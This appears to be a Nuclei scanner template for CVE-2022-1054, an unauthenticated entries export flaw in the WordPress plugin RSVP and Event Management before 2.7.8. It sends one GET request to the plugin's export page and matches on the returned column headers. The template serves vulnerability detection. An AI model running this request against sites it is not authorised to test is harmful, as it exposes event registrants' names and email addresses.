30 lines
904 B
YAML
30 lines
904 B
YAML
id: CVE-2022-1054
|
|
|
|
info:
|
|
name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
The plugin does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of users registered for events.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
|
|
tags: wp,wp-plugin,wordpress,cve,cve2022
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'RSVP Status'
|
|
- '"First Name"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|